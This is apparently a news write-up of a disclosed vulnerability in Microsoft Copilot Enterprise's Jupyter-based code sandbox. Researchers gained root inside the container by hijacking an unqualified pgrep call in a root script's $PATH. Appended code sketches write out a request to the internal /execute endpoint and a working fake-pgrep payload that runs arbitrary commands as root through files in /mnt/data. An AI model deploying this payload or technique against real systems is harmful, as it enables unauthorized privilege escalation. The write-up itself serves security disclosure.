A critical vulnerability in Microsoft Copilot Enterprise allowed unauthorized root access to its backend container. The issue originated in an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. The flaw was detailed in a blog post by Eye Security, which playfully likened interacting with Copilot to coaxing an unpredictable child.

Using Jupyter's %command syntax, the researchers executed arbitrary Linux commands as the 'ubuntu' user inside a miniconda environment. Despite that user belonging to the sudo group, no sudo binary existed in the container, adding an ironic layer to the setup. Exploration revealed the sandbox's core role of running Jupyter Notebooks alongside a Tika server, inside a container with a limited link-local network interface (a /32 netmask) and an OverlayFS filesystem linked to a /legion path on the host. The sandbox mirrored ChatGPT's model but ran a newer kernel and Python 3.12, compared to ChatGPT's 3.11 at the time.

A key binary, goclientapp in /app, acted as the container's interface, running a web server on port 6000 that accepted POST requests to an /execute endpoint. Simple JSON payloads, such as {"code": "%env"}, triggered code execution in the Jupyter environment.

The critical oversight sat on line 28 of a script running as root: a pgrep command invoked without a full path inside a 'while true' loop that fired every two seconds. The lookup relied on the $PATH variable, which listed writable directories such as /app/miniconda/bin ahead of /usr/bin, where the legitimate pgrep resides. Exploiting this, the researchers crafted a malicious Python script disguised as pgrep and dropped it into the writable path. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and wrote the output to /mnt/data/out. This granted root access inside the container and enabled filesystem exploration, though no sensitive data or breakout paths were found, as known vulnerabilities had been patched.

The researchers noted the exploit ultimately yielded "absolutely nothing" beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse. Eye Security reported the issue to Microsoft's Security Response Center (MSRC) on April 18, 2025. Microsoft has not publicly commented, but the swift fix demonstrates proactive security measures in an evolving AI landscape.
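To make the goclientapp interface described above concrete, here is a minimal sketch of the kind of request it reportedly accepted. Only the port (6000), the /execute path, and the {"code": "%env"} payload shape come from the write-up; that the service is reachable at localhost from inside the sandbox, and the response handling, are assumptions.

```python
# Hypothetical probe of the sandbox's internal code-execution interface.
# Grounded in the article: port 6000, POST /execute, a {"code": "..."} payload.
# Assumptions: the service listens on localhost inside the container and
# returns a readable body; the real request/response schema may differ.
import requests

payload = {"code": "%env"}  # Jupyter line magic that dumps environment variables

resp = requests.post("http://localhost:6000/execute", json=payload, timeout=10)
print(resp.status_code)
print(resp.text)
```

The researchers reached this code path through the Copilot chat itself; the direct POST above is only meant to illustrate the payload shape the article describes.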
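The root-level payload itself is described only at a high level: a Python script named pgrep, placed in a writable $PATH directory ahead of /usr/bin, that reads commands from /mnt/data/in, runs them with popen, and writes the output to /mnt/data/out. A minimal sketch under those constraints might look like the following; the shebang, the fall-through to the real pgrep, and the error handling are assumptions rather than details from the article.

```python
#!/usr/bin/env python3
# Sketch of a PATH-hijack payload in the spirit of the one described above.
# Saved as an executable file named "pgrep" in a writable directory (e.g.
# /app/miniconda/bin) that precedes /usr/bin in $PATH, so the root-owned
# two-second keep-alive loop runs this file instead of the real pgrep.
# The shebang, pass-through behaviour and error handling are assumptions.
import os
import subprocess
import sys

IN_FILE = "/mnt/data/in"    # command dropped here via a Copilot file upload
OUT_FILE = "/mnt/data/out"  # command output is written back here

if os.path.exists(IN_FILE):
    cmd = open(IN_FILE).read().strip()
    if cmd:
        # popen-style execution: runs with the privileges of the caller,
        # i.e. root when invoked from the keep-alive loop
        output = os.popen(cmd).read()
        with open(OUT_FILE, "w") as f:
            f.write(output)

# Keep the caller happy by delegating to the genuine pgrep afterwards,
# so the loop that invoked this file still behaves as expected.
sys.exit(subprocess.call(["/usr/bin/pgrep"] + sys.argv[1:]))
```

From the sandbox side, the attacker would then write a command into /mnt/data/in (for example by asking Copilot to save a file there) and, within a couple of seconds, read the root-level output back from /mnt/data/out.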